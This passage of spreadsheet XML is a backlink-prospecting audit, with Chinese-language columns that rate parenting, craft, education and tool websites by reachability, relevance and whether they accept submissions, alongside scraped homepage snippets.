      <x:c r="H48" s="19" t="str">
        <x:v>https://www.weebly.com/</x:v>
      </x:c>
      <x:c r="I48" s="19" t="str">
        <x:v>Free Website Builder: Build a Free Website or Online Store | Weebly</x:v>
      </x:c>
      <x:c r="J48" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K48" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L48" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M48" s="19" t="str">
        <x:v>https://www.weebly.com/</x:v>
      </x:c>
      <x:c r="N48" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O48" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P48" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q48" s="21" t="str">
        <x:v>Weebly’s free website builder makes it easy to create a website, blog, or online store. Find customizable templates, domains, and easy-to-use tools for any type of business website. Free Website Builder: Build a Free Website or Online Store | Weebly Or transfer your domain &gt; Websites Online Stores Pricing More Log In Sign Up Sign Up Websites Online Stores Pricing More Themes Features App Center SEO Guide Help Center Blog Log In Get Started Themes Features Blog App Center SEO Guide Help Build a professional website that grows with your business. Create Your Website Build a free website that grows with your business. Get access to customizable webpage designs and useful tools to build your website and grow your ideal business. Easily build a free website to help you get discovered and grow your customer base in style. Start today with our powerful free website builder. Ge</x:v>
      </x:c>
      <x:c r="R48" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S48" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T48" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://weebly.com</x:v>
      </x:c>
    </x:row>
    <x:row r="49">
      <x:c r="A49" s="18" t="str">
        <x:v>48</x:v>
      </x:c>
      <x:c r="B49" s="19" t="str">
        <x:v>tracyharris.co</x:v>
      </x:c>
      <x:c r="C49" s="19" t="str">
        <x:v>https://tracyharris.co</x:v>
      </x:c>
      <x:c r="D49" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E49" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F49" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G49" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H49" s="19" t="str">
        <x:v>https://tracyharris.co/</x:v>
      </x:c>
      <x:c r="I49" s="19" t="str">
        <x:v>Mums With Hustle - Tracy Harris</x:v>
      </x:c>
      <x:c r="J49" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K49" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L49" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M49" s="19" t="str">
        <x:v>https://tracyharris.co/</x:v>
      </x:c>
      <x:c r="N49" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O49" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P49" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q49" s="21" t="str">
        <x:v>Join me in my Free Masterclass: The Instagram Growth Plan! I am sharing my exact Instagram plan for Mums in business that reduces overwhelm, grows your audience AND your business. Mums With Hustle - Tracy Harris Skip to content Student Login Home About Podcast Blog Mastermind Elite Consulting Programs Freedom Filled® Business Mentorship Freebies + Instagram Stories Instagram Reels Instagram Bio Checklist MWH Digest Contact Home About Podcast Blog Mastermind Programs Freedom Filled® Business Elite Consulting Freebies + Instagram Story Strategy Pack Instagram Reels Instagram Bio Checklist MWH Digest Contact Student Login TRACY HARRIS CO. Lead your business and your life with more peace, profit, and presence. Grow your digital business around ​your family and lifestyle. Not the other way around. TRACY HARRIS CO. Lead your business and your life with more peace, profit, a</x:v>
      </x:c>
      <x:c r="R49" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S49" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T49" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://tracyharris.co</x:v>
      </x:c>
    </x:row>
    <x:row r="50">
      <x:c r="A50" s="18" t="str">
        <x:v>49</x:v>
      </x:c>
      <x:c r="B50" s="19" t="str">
        <x:v>halo2.cc</x:v>
      </x:c>
      <x:c r="C50" s="19" t="str">
        <x:v>https://halo2.cc</x:v>
      </x:c>
      <x:c r="D50" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E50" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F50" s="20"/>
      <x:c r="G50" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H50" s="19" t="str"/>
      <x:c r="I50" s="19" t="str"/>
      <x:c r="J50" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K50" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L50" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M50" s="19" t="str">
        <x:v>https://halo2.cc</x:v>
      </x:c>
      <x:c r="N50" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O50" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P50" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q50" s="21" t="str"/>
      <x:c r="R50" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S50" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T50" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://halo2.cc
http://halo2.cc</x:v>
      </x:c>
    </x:row>
    <x:row r="51">
      <x:c r="A51" s="18" t="str">
        <x:v>50</x:v>
      </x:c>
      <x:c r="B51" s="19" t="str">
        <x:v>colorandkindness.com</x:v>
      </x:c>
      <x:c r="C51" s="19" t="str">
        <x:v>https://colorandkindness.com</x:v>
      </x:c>
      <x:c r="D51" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E51" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F51" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G51" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H51" s="19" t="str">
        <x:v>https://www.colorandkindness.com/</x:v>
      </x:c>
      <x:c r="I51" s="19" t="str">
        <x:v>Color + Kindness</x:v>
      </x:c>
      <x:c r="J51" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K51" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L51" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M51" s="19" t="str">
        <x:v>https://www.colorandkindness.com/</x:v>
      </x:c>
      <x:c r="N51" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O51" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P51" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q51" s="21" t="str">
        <x:v>Faith building activities, crafts, and encouragement for families and moms. Bible lessons and free resources for kids Color + Kindness Color + Kindness Home SHOP BLOG FREE RESOURCES THE STORY Connect Sign In My Account Home / SHOP / BLOG / FREE RESOURCES / THE STORY / Connect / Sign In My Account Feeding Faith and Kids Creatively WELCOME Home / SHOP / BLOG / FREE RESOURCES / THE STORY / Connect / Sign In My Account THE SHOP Take a peek at the printable shop full of scripture cards, Bible curriculum, Bible reading plans, and more. Plus, for every dollar spent in the shop, the cost of a meal is donated to Feed My Starving Children. SHOP THE BLOG Creating + connecting doesn't need to be complicated! On the blog, you'll find fresh ideas, simple activities, and some of our favorite reads and resources. READ THE </x:v>
      </x:c>
      <x:c r="R51" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S51" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T51" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://colorandkindness.com</x:v>
      </x:c>
    </x:row>
    <x:row r="52">
      <x:c r="A52" s="18" t="str">
        <x:v>51</x:v>
      </x:c>
      <x:c r="B52" s="19" t="str">
        <x:v>luke.lol</x:v>
      </x:c>
      <x:c r="C52" s="19" t="str">
        <x:v>https://luke.lol</x:v>
      </x:c>
      <x:c r="D52" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E52" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F52" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G52" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H52" s="19" t="str">
        <x:v>https://luke.lol/</x:v>
      </x:c>
      <x:c r="I52" s="19" t="str">
        <x:v>Luke's Tools</x:v>
      </x:c>
      <x:c r="J52" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K52" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L52" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M52" s="19" t="str">
        <x:v>https://luke.lol/</x:v>
      </x:c>
      <x:c r="N52" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O52" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P52" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q52" s="21" t="str">
        <x:v>Practical web tools, live status pages, photos, and writing by Luke. Luke's Tools Skip to main content luke.lol Luke's Blog Useful corners of the web Luke's Tools Small, focused tools and reference pages. Browser-only tools say so clearly; network tools make only the requests you initiate. Tools and projects QR Code Generator Create private, downloadable SVG and PNG QR codes without sending input anywhere. Pitch Detector and Tuner Tune an instrument with a modern chromatic meter; microphone audio stays in your browser. Alarmify Set a browser alarm or countdown with notifications, a wake lock, and an optional Spotify link. USPS Intelligent Mail Barcode Decoder Decode or build 65-bar Intelligent Mail barcodes entirely in the browser. Text Case Converter Change </x:v>
      </x:c>
      <x:c r="R52" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S52" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T52" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://luke.lol</x:v>
      </x:c>
    </x:row>
    <x:row r="53">
      <x:c r="A53" s="18" t="str">
        <x:v>52</x:v>
      </x:c>
      <x:c r="B53" s="19" t="str">
        <x:v>majegant.com</x:v>
      </x:c>
      <x:c r="C53" s="19" t="str">
        <x:v>https://majegant.com</x:v>
      </x:c>
      <x:c r="D53" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E53" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F53" s="20"/>
      <x:c r="G53" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H53" s="19" t="str"/>
      <x:c r="I53" s="19" t="str"/>
      <x:c r="J53" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K53" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L53" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M53" s="19" t="str">
        <x:v>https://majegant.com</x:v>
      </x:c>
      <x:c r="N53" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O53" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P53" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q53" s="21" t="str"/>
      <x:c r="R53" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S53" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T53" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://majegant.com
http://majegant.com</x:v>
      </x:c>
    </x:row>
    <x:row r="54">
      <x:c r="A54" s="18" t="str">
        <x:v>53</x:v>
      </x:c>
      <x:c r="B54" s="19" t="str">
        <x:v>sisterswhat.com</x:v>
      </x:c>
      <x:c r="C54" s="19" t="str">
        <x:v>https://sisterswhat.com</x:v>
      </x:c>
      <x:c r="D54" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E54" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F54" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G54" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H54" s="19" t="str">
        <x:v>https://www.sisterswhat.com/</x:v>
      </x:c>
      <x:c r="I54" s="19" t="str">
        <x:v>Sisters, What!</x:v>
      </x:c>
      <x:c r="J54" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K54" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L54" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M54" s="19" t="str">
        <x:v>https://www.sisterswhat.com/</x:v>
      </x:c>
      <x:c r="N54" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O54" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P54" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q54" s="21" t="str">
        <x:v>easy tutorials for beginning craft projects, easy sewing, crocheting and beginner home decor. Sisters, What! DIY &amp; craft _Crafts _For the Home _Kid Crafting _Printables Sewing _sewing projects _sewing for kids _sewing woman's clothing _Clothing Refashion About _about me _We Believe _Contact Us _policies Shop _Etsy _Amazon Favorites _Spoonflower Homeschool _Handicrafts _Printables Close Pinterest Instagram Facebook Youtube Featured Slider Easy DIY Ghost Sweatshirt with Reverse Applique Friday, August 28, 2026 Make your own DIY Halloween ghost sweatshirt with this simple reverse applique embroidery project. It’s a fun way to use up scrap fabric and turn a plain sweatshirt into a cute handmade Halloween shirt. You don’t need to be an experienced embroiderer either—this is a great beginn</x:v>
      </x:c>
      <x:c r="R54" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S54" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T54" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sisterswhat.com</x:v>
      </x:c>
    </x:row>
    <x:row r="55">
      <x:c r="A55" s="18" t="str">
        <x:v>54</x:v>
      </x:c>
      <x:c r="B55" s="19" t="str">
        <x:v>csie.cc</x:v>
      </x:c>
      <x:c r="C55" s="19" t="str">
        <x:v>https://csie.cc</x:v>
      </x:c>
      <x:c r="D55" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E55" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F55" s="20"/>
      <x:c r="G55" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H55" s="19" t="str"/>
      <x:c r="I55" s="19" t="str"/>
      <x:c r="J55" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K55" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L55" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M55" s="19" t="str">
        <x:v>https://csie.cc</x:v>
      </x:c>
      <x:c r="N55" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O55" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P55" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q55" s="21" t="str"/>
      <x:c r="R55" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S55" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T55" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://csie.cc
http://csie.cc</x:v>
      </x:c>
    </x:row>
    <x:row r="56">
      <x:c r="A56" s="18" t="str">
        <x:v>55</x:v>
      </x:c>
      <x:c r="B56" s="19" t="str">
        <x:v>findglocal.com</x:v>
      </x:c>
      <x:c r="C56" s="19" t="str">
        <x:v>https://findglocal.com</x:v>
      </x:c>
      <x:c r="D56" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E56" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F56" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G56" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H56" s="19" t="str">
        <x:v>https://findglocal.com/</x:v>
      </x:c>
      <x:c r="I56" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J56" s="19" t="str">
        <x:v>本地目录</x:v>
      </x:c>
      <x:c r="K56" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L56" s="19" t="str">
        <x:v>本地商家 listing</x:v>
      </x:c>
      <x:c r="M56" s="19" t="str">
        <x:v>https://www.findglocal.com/faq</x:v>
      </x:c>
      <x:c r="N56" s="19" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="O56" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P56" s="21" t="str">
        <x:v>需要 Facebook business page，且目录以本地商家为主，SEO 和产品相关性都较弱。</x:v>
      </x:c>
      <x:c r="Q56" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access findglocal.com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a349b8fc7effc713 &amp;bull; Your IP: Click </x:v>
      </x:c>
      <x:c r="R56" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S56" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T56" s="21" t="str">
        <x:v>不列入首批。 | 请求: https://findglocal.com</x:v>
      </x:c>
    </x:row>
    <x:row r="57">
      <x:c r="A57" s="18" t="str">
        <x:v>56</x:v>
      </x:c>
      <x:c r="B57" s="19" t="str">
        <x:v>happytotshelf.com</x:v>
      </x:c>
      <x:c r="C57" s="19" t="str">
        <x:v>https://happytotshelf.com</x:v>
      </x:c>
      <x:c r="D57" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E57" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F57" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G57" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H57" s="19" t="str">
        <x:v>https://happytotshelf.com/</x:v>
      </x:c>
      <x:c r="I57" s="19" t="str">
        <x:v>Easy Kid Activities &amp; Printables for Busy Parents - Happy Tot Shelf</x:v>
      </x:c>
      <x:c r="J57" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K57" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L57" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M57" s="19" t="str">
        <x:v>https://happytotshelf.com/</x:v>
      </x:c>
      <x:c r="N57" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O57" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P57" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q57" s="21" t="str">
        <x:v>From easy activity ideas, learning printables to our popular kids' activity membership, we are here to make home learning FUN for children and EASY for busy parents. Easy Kid Activities &amp; Printables for Busy Parents - Happy Tot Shelf Skip to main content Skip to primary sidebar Happy Tot Shelf Find an Activity Activity Membership Learning Space Free Printables About HTS Search Find an Activity Activity Membership Learning Space Free Printables About HTS × Easy Kid Activities &amp; Printables for Busy Parents Here you will find everything you need to make learning fun, joyful and engaging for your children. From easy activity ideas, learning printables to our popular kids' activity membership, we are here to make home learning FUN for children and EASY for busy parents. Summer Activities for Kids 10 Cool Activities with Ice to Kickstart the Summer Pool Noodle</x:v>
      </x:c>
      <x:c r="R57" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S57" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T57" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://happytotshelf.com</x:v>
      </x:c>
    </x:row>
    <x:row r="58">
      <x:c r="A58" s="18" t="str">
        <x:v>57</x:v>
      </x:c>
      <x:c r="B58" s="19" t="str">
        <x:v>bajadad.com</x:v>
      </x:c>
      <x:c r="C58" s="19" t="str">
        <x:v>https://bajadad.com</x:v>
      </x:c>
      <x:c r="D58" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E58" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F58" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G58" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H58" s="19" t="str">
        <x:v>https://www.bajadad.com/</x:v>
      </x:c>
      <x:c r="I58" s="19" t="str">
        <x:v>BajaDad — Real Talk on Fatherhood &amp; Family Life</x:v>
      </x:c>
      <x:c r="J58" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K58" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L58" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M58" s="19" t="str">
        <x:v>https://www.bajadad.com/</x:v>
      </x:c>
      <x:c r="N58" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O58" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P58" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q58" s="21" t="str">
        <x:v>BajaDad is your go‑to for honest insights on fatherhood, family life, parenting challenges, and how dads can stay present and connected. BajaDad — Real Talk on Fatherhood &amp; Family Life Skip to content Home About Us Contact us Blogs Fatherhood Lessons Family Reunions and Visits Long-Distance Fatherhood Personal Growth Family Travel Connection Hacks Early Childhood Speech &amp; Language Speech and Development Play and Engagement Dad Wellness Child Development Parenting Resources Emotional Connection Dad Lifestyle Financial Parenting Support Networks Faith &amp; Reflection Digital Parenting Emotional Ties Spread the love Where Dadhood Takes Center Stage! CHECK OUT THE BLOG Welcome to BajaDad, a corner of the internet where fatherhood transcends geography. I’m Curtise: once a stay-at-home dad in Mexico, now a parent navigating distance f</x:v>
      </x:c>
      <x:c r="R58" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S58" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T58" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://bajadad.com</x:v>
      </x:c>
    </x:row>
    <x:row r="59">
      <x:c r="A59" s="18" t="str">
        <x:v>58</x:v>
      </x:c>
      <x:c r="B59" s="19" t="str">
        <x:v>cms-web.org</x:v>
      </x:c>
      <x:c r="C59" s="19" t="str">
        <x:v>https://cms-web.org</x:v>
      </x:c>
      <x:c r="D59" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E59" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F59" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G59" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H59" s="19" t="str">
        <x:v>https://cms-web.org/</x:v>
      </x:c>
      <x:c r="I59" s="19" t="str">
        <x:v>検索 - Microsoft Bing</x:v>
      </x:c>
      <x:c r="J59" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K59" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L59" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M59" s="19" t="str">
        <x:v>https://cms-web.org/</x:v>
      </x:c>
      <x:c r="N59" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O59" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P59" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q59"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Copilot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59" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S59" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T59" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cms-web.org</x:v>
      </x:c>
    </x:row>
    <x:row r="60">
      <x:c r="A60" s="18" t="str">
        <x:v>59</x:v>
      </x:c>
      <x:c r="B60" s="19" t="str">
        <x:v>mamaloveslittles.com</x:v>
      </x:c>
      <x:c r="C60" s="19" t="str">
        <x:v>https://mamaloveslittles.com</x:v>
      </x:c>
      <x:c r="D60" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E60" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F60" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G60" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H60" s="19" t="str">
        <x:v>https://mamaloveslittles.com/</x:v>
      </x:c>
      <x:c r="I60" s="19" t="str">
        <x:v>Mama Loves Littles</x:v>
      </x:c>
      <x:c r="J60" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K60" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L60" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M60" s="19" t="str">
        <x:v>https://mamaloveslittles.com/</x:v>
      </x:c>
      <x:c r="N60" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O60" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P60" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q60" s="21" t="str">
        <x:v>A pregnancy and parenthood blog Mama Loves Littles Skip to content Home About Pregnancy Parenthood Working Mom Life Activities for Littles Sensory Bins Contact Me Parenthood Can You Breastfeed After A C-Section? Tips For New Moms April 18, 2023 April 18, 2023 This post is for moms who are planning to have a c-section and want to prepare for breastfeeding in the hospital and once they are home. It will also be… Read More Can You Breastfeed After A C-Section? Tips For New Moms Parenthood 25 Festive Things To Do On Christmas Day At Home November 6, 2022 November 6, 2022 After my husband and I had our first child, we decided on no more traveling on Christmas Day. We want to stay home as a family and enjoy the day… Read More 25</x:v>
      </x:c>
      <x:c r="R60" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S60" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T60" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mamaloveslittles.com</x:v>
      </x:c>
    </x:row>
    <x:row r="61">
      <x:c r="A61" s="18" t="str">
        <x:v>60</x:v>
      </x:c>
      <x:c r="B61" s="19" t="str">
        <x:v>careforkids.com.au</x:v>
      </x:c>
      <x:c r="C61" s="19" t="str">
        <x:v>https://careforkids.com.au</x:v>
      </x:c>
      <x:c r="D61" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E61" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F61" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G61" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H61" s="19" t="str">
        <x:v>https://www.careforkids.com.au/</x:v>
      </x:c>
      <x:c r="I61" s="19" t="str">
        <x:v>403 Forbidden</x:v>
      </x:c>
      <x:c r="J61" s="19" t="str">
        <x:v>澳洲托育商业媒体</x:v>
      </x:c>
      <x:c r="K61" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L61" s="19" t="str">
        <x:v>付费内容营销</x:v>
      </x:c>
      <x:c r="M61" s="19" t="str">
        <x:v>https://www.careforkids.com.au/articles/edm/media-kit-careforkids.com.au.pdf</x:v>
      </x:c>
      <x:c r="N61" s="19" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="O61" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P61" s="21" t="str">
        <x:v>公开媒体包显示 guest/content marketing 为高价付费服务，且受众是澳洲托育机构。</x:v>
      </x:c>
      <x:c r="Q61" s="21" t="str">
        <x:v>403 Forbidden 403 Forbidden Microsoft-Azure-Application-Gateway/v2</x:v>
      </x:c>
      <x:c r="R61" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
